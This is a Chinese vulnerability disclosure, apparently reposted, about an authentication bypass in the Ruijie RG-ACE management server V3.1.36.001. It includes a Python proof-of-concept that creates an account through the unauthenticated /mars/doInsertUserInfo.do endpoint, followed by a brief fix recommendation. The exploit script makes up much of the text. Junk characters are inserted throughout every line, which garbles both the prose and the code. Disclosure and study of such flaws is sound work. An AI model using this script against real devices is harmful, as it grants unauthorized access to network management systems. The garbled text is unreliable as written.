锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)% c! S7 I% D$ g. |, a7 I
/ b* Y/ ^, {; L1 k6 ]' d! R" H
2 j8 T. u9 J z$ ]& B7 q测试的具体版本是
1 ?6 c4 V \; o6 u; C产品名称: 锐捷应用控制引擎
) v/ v0 t9 N1 T ]1 G1 q版本号: 3.1.36.001 TC
! R1 A* V" J# b3 Z3 V: Z编译时间: 201104291730# K$ Y& ]) \% c4 C% u5 n2 p( O
$ h6 D8 L" d/ |, P' @" X0 Z( g
& w9 Q% H n& m漏洞证明:5 W2 T- q' W% U" g' \* E* F
7 r7 Q+ S8 U5 C. k- Z& N3 u: I
) A. ^! G* \- Q9 B8 x* F/ f' w
. R& i n9 W! D( y
. C) @% J4 M/ J: r' i9 k# Z
1 J8 P/ M, \) H2 _8 p, S R" k4 Q7 m2 L" A q. r5 L! W o8 L
执行脚本
! e! a8 p% \6 c#! /usr/bin/env python
. i \) `- u. i1 r5 n#coding=gbk$ c$ x% Y$ O& d' q3 g( W& p
#RG-ACE管理服务器 V3.1.36.001
8 x9 P8 |# ?* }8 J3 F% N* e& Ximport urllib2, urllib,cookielib
) C) q( o' d) i' `! _/ M7 V# lurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
* Z# Y" i# i9 P7 ?3 }* n* j$ V8 sopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
6 k Y D+ F; `+ {4 _% kopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]- d5 |: ]4 y: l. y
post=(("event","userManager.doInsertUserInfo"),) K! S( U' H* n- v3 \- s9 A- {
("useractionname","addButtonValue"),& C/ @1 W9 C9 s0 n6 c, C
("useropermanager","userManager"),2 r2 ^: e g o& w, V4 N' b
("userName","t"), #######账号自己加
9 `: x; T' H N* W) o9 S("pwd","aaaaaa"),######密码自己加
8 V; O9 u7 T" i("trueName","ad"),8 V& C2 _: R2 `% a
("email",""),% H2 ~: t) Q6 U% u5 j
("mobilePhone",""),, N D$ A0 z3 h4 [: q
("officePhone",""),% ]' X6 V2 |; x9 b
("addr",""),
! g5 U2 O* h3 Y7 B8 S5 k("submit","确定"))
. R+ i# [% n3 R2 E( S7 purllib2.install_opener(opener)# r G+ a2 j) M6 u
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
$ V9 [- {" f! c1 C4 }7 G& d9 `print "Done"# t: N0 N$ P$ S2 l: D
- _4 K+ i5 q4 T/ ]9 E2 F
登录,连接设备7 y- ~! |+ ~$ T9 R$ }4 z) h, w
* ^6 h c j, `7 c/ W
( g6 m8 Z. y4 U9 F
/ v/ X: X$ ^9 A% { G# q3 O( J9 E' o
3 |7 C: Q% u* \7 b
默认的管理员admin权限更大点
' E& _ c+ {2 T9 w5 l- s2 B+ F& z" @1 m3 ?6 Z. c5 Y# H
- X5 v& F8 E2 R
6 G. p) @, o6 V, _% t
5 ^& A7 @8 e2 i R
& U1 o$ ^3 B8 y修复方案:
' _: ]7 X; G# d加强对接口的权限验证$ o# I3 Y) p! u: F- ~' @+ v
Q/ b' c0 v9 S2 }# \
|